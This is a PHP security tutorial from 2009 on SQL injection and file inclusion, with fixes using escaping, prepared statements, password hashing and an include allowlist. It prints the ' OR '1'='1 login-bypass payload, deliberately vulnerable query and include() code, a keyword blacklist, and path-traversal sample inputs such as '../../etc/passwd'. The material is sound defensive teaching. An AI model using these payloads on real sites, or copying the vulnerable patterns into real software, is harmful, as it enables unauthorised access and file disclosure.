Do you know what SQL Injection is?

30 August 2009 | In Web


We are going to talk about a very important subject that concerns the safety of our PHP and MySQL projects: the dreaded SQL Injection. If you are a programmer you have surely heard of it, but if you never quite understood it, I will explain what it is about.

SQL Injection is an attack that sends malicious SQL commands to the database through form fields or URL parameters. A successful attack can, for example, drop a database table, delete all the data in a table, or even read the passwords stored in it.

Below is an example of a vulnerable login system:

// Vulnerable: the POSTed values are concatenated straight into the SQL text
$usuario = $_POST['usuario'];
$senha = $_POST['senha'];
$sql = "SELECT * FROM usuarios WHERE usuario = '".$usuario."' AND senha = '".$senha."' ";
$processa = mysql_query($sql);

In this example the variables $usuario and $senha receive content coming straight from a form via the POST method. Imagine that the content of $senha is ' OR '1'='1 and that the username typed was admin. Since no validation is performed, the statement sent to MySQL becomes

SELECT * FROM usuarios WHERE usuario = 'admin' AND senha = '' OR '1'='1'

Because AND binds tighter than OR, the WHERE clause is true for every row, and the malicious user is logged in without ever having supplied a valid password. The flaw is in how the SQL statement is generated, not in MySQL itself.

Let us look at another example of a vulnerability. Many sites organize their internal pages through include(), choosing the file from a $_GET variable. Strictly speaking this is a file inclusion flaw rather than SQL Injection, but the root cause is identical: a value taken from the URL is used without any validation.

// Check whether $_GET['pagina'] exists
if (isset($_GET['pagina'])) {
    // Take the value of $_GET['pagina'] (vulnerable: no validation at all)
    $arquivo = $_GET['pagina'];
} else {
    // If the variable does not exist, use a default value
    $arquivo = 'home.php';
}
include ($arquivo); // Include the file

The site's URLs then carry the file to include in the pagina parameter of the query string, and that value is whatever the visitor chooses to send.

With this the "attacker" can, for example, put the path of a script hosted elsewhere in place of the file name.

Your site would include that file as if it were its own and run everything inside it... and your database could be completely wiped. Whether a remote URL can be included depends on the PHP configuration (allow_url_fopen, and from PHP 5.2 on the separate allow_url_include setting), but even with remote inclusion disabled the same code lets the visitor include any local file the web server can read.
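As an added example (not code from the original post), here is the include() dispatcher above rewritten so that the pagina parameter can only select one of the files the site itself defines: the visitor supplies a key, never a path. The page names, the file names and the sample requests are assumptions made up for this demo.

```php
<?php
// Added example, not code from the original post: an allowlist dispatcher
// for include(). The page names, file names and sample requests below are
// assumptions made up for this demo.

// Public page names mapped to the files they load; nothing outside this map is ever included.
$paginas = array(
    'home'    => 'home.php',
    'contato' => 'contato.php',
    'sobre'   => 'sobre.php',
);

// Returns the absolute path of the file to include, or null when the request must be refused.
function resolver_pagina(array $paginas, $nome)
{
    // No parameter at all: fall back to the default page.
    if ($nome === null || $nome === '') {
        $nome = 'home';
    }
    // ?pagina[]=x arrives as an array; anything that is not a plain string is refused.
    if (!is_string($nome) || !isset($paginas[$nome])) {
        return null;
    }
    // The visitor only ever supplies a key; the path comes from our own table.
    return __DIR__ . '/' . $paginas[$nome];
}

// Constructed sample requests: the two legitimate ones resolve, the rest are refused.
$amostras = array(
    null,                         // no pagina parameter
    'contato',                    // normal link
    '../../etc/passwd',           // local file traversal attempt
    'http://example.com/x.txt',   // remote script
    'home.php',                   // a real file name, but not a key in the map
);
foreach ($amostras as $pedido) {
    $arquivo = resolver_pagina($paginas, $pedido);
    printf("%-28s => %s\n", var_export($pedido, true), $arquivo === null ? 'refused' : $arquivo);
}

// In the real page the dispatch is the same call followed by the include:
//   $arquivo = resolver_pagina($paginas, isset($_GET['pagina']) ? $_GET['pagina'] : null);
//   if ($arquivo === null) { header('HTTP/1.0 404 Not Found'); exit('Page not found'); }
//   include $arquivo;
```

The important design choice is that the map is the only source of file paths: there is no need to filter out "../" or "http://" because the user's value is never treated as a path in the first place, only compared against known keys.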

Got scared? Calm down. To protect your work, just follow one basic rule:

"ALWAYS validate any kind of data your project receives, whether via form (POST) or via query string (GET)."

Now you must be wondering what to do to protect yourself from these attacks. There are dozens of "tricks" available on the internet for validating data. Here are just a few:

- You can combine addslashes() and trim() when receiving the data. The first adds a backslash before every single quote, double quote, backslash and NUL byte that appears, a process known as ESCAPING. The second strips leading and trailing whitespace. You can also use just one of the two. Keep in mind that addslashes() knows nothing about the database's character set, so it is not a substitute for the database driver's own escaping function.

$usuario = addslashes($_POST['usuario']);
$usuario = trim($usuario);
$senha = addslashes($_POST['senha']);
$senha = trim($senha);

- You can use mysql_real_escape_string() when receiving the data. This function escapes (it does not remove) the characters that have a special meaning inside a MySQL string literal, taking the connection's character set into account, which is why it needs an open connection. Note that it does not escape % and _, which are only special inside LIKE patterns; escape those separately if the value ends up in a LIKE.

$usuario = mysql_real_escape_string($_POST['usuario']);
$senha = mysql_real_escape_string($_POST['senha']);

- You can use strip_tags() when receiving the data. This function removes all HTML and PHP tags from the supplied data. Note that this protects against HTML being echoed back to the browser (cross-site scripting); it does nothing against SQL, since quotes and comment markers pass through it untouched.

$usuario = strip_tags($_POST['usuario']);
$senha = strip_tags($_POST['senha']);

The second parameter of the same function indicates which tags are allowed to remain.

$usuario = strip_tags($_POST['usuario'], '<em><strong></strong></em>');

- For every variable that should be an integer, you can use intval(). This way you eliminate any non-numeric content, leaving only an integer value, which can then be placed in the query without quotes.

- You can also combine several functions into a single, more comprehensive one. Here is an example:

function protecao($string){
$string = str_replace(" or ", "", $string);
$string = str_replace("select ", "", $string);
$string = str_replace("delete ", "", $string);
$string = str_replace("create ", "", $string);
$string = str_replace("drop ", "", $string);
$string = str_replace("update ", "", $string);
$string = str_replace("drop table", "", $string);
$string = str_replace("show table", "", $string);
$string = str_replace("applet", "", $string);
$string = str_replace("object", "", $string);
$string = str_replace("'", "", $string);
$string = str_replace("#", "", $string);
$string = str_replace("=", "", $string);
$string = str_replace("--", "", $string);
$string = str_replace("-", "", $string);
$string = str_replace(";", "", $string);
$string = str_replace("*", "", $string);
$string = strip_tags($string);
return $string;
}

Be aware of what this approach does and does not do: str_replace() is case-sensitive, so "SELECT" or " OR " pass straight through, and deleting substrings also mangles legitimate input (a name containing "or" loses those letters). Keyword blacklists like this are easy to get around, so treat them as an extra layer, never as the protection itself. The dependable fix is to keep data out of the SQL text altogether with prepared statements (mysqli or PDO, available since PHP 5), where the query is sent with placeholders and the values travel separately.

- If you are working with passwords or sensitive data, consider protecting them with a one-way HASH rather than storing them as typed. md5() and sha1() are one-way: the original value cannot be recovered from the hash, so you compare hashes instead of plaintext. base64, on the other hand, is just an encoding that anyone can reverse, so it offers no protection at all. Also bear in mind that a plain, unsalted md5 or sha1 of a password can be matched against precomputed tables; on current PHP (5.5 and later) use password_hash() and password_verify(), which salt the hash and use a deliberately slow algorithm. Read more about them and protect yourself.
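As an added example (not code from the original post), here is the login query from the beginning of the article run with the ' OR '1'='1 payload, next to a version that uses a prepared statement and a hashed password, which is what the "tricks" above are working towards. It runs against an in-memory SQLite database through PDO so no MySQL server is needed; the pdo_sqlite extension, the table layout and the single admin user are assumptions for the demo.

```php
<?php
// Added example, not code from the original post. Assumed: the pdo_sqlite
// extension is enabled; the table and the admin row are constructed here.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE usuarios (id INTEGER PRIMARY KEY, usuario TEXT, senha TEXT)');

// Store a salted hash, never the plaintext. password_hash() exists since PHP 5.5.
$stmt = $db->prepare('INSERT INTO usuarios (usuario, senha) VALUES (?, ?)');
$stmt->execute(array('admin', password_hash('s3cret', PASSWORD_DEFAULT)));

// The article's query, built by string concatenation: the input becomes part of the SQL.
function login_vulneravel(PDO $db, $usuario, $senha)
{
    $sql = "SELECT * FROM usuarios WHERE usuario = '" . $usuario . "' AND senha = '" . $senha . "'";
    echo "SQL executed: $sql\n";
    return $db->query($sql)->fetch(PDO::FETCH_ASSOC);
}

// Hardened version: a prepared statement keeps the input as data, and the
// password is checked against the stored hash instead of being compared in SQL.
function login_seguro(PDO $db, $usuario, $senha)
{
    $stmt = $db->prepare('SELECT * FROM usuarios WHERE usuario = ?');
    $stmt->execute(array($usuario));
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($senha, $row['senha'])) {
        return false;
    }
    return $row;
}

$payload = "' OR '1'='1";

// With the vulnerable query the payload makes the WHERE clause true for every row.
// The stored value is a hash, so a plain comparison could never match; the
// injected OR simply bypasses the comparison altogether.
$row = login_vulneravel($db, 'admin', $payload);
echo $row ? "vulnerable login: logged in as {$row['usuario']}\n" : "vulnerable login: rejected\n";

// The prepared statement sends the same payload as a literal string value.
$row = login_seguro($db, 'admin', $payload);
echo $row ? "safe login: logged in as {$row['usuario']}\n" : "safe login: rejected\n";

// The legitimate password still works.
$row = login_seguro($db, 'admin', 's3cret');
echo $row ? "safe login with real password: logged in as {$row['usuario']}\n" : "safe login: rejected\n";
```

Running it prints the injected statement exactly as the database receives it, then shows the vulnerable function accepting the payload while the prepared version rejects it and still accepts the real password. The two changes are independent: the placeholder stops the injection, and the hash means that even a successful read of the table does not hand over usable passwords.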

With quotes from Digital Zoom

From Ivaiporã-PR, computer engineer, administrator of the Dicas em Geral group. Passionate about technology and computing.
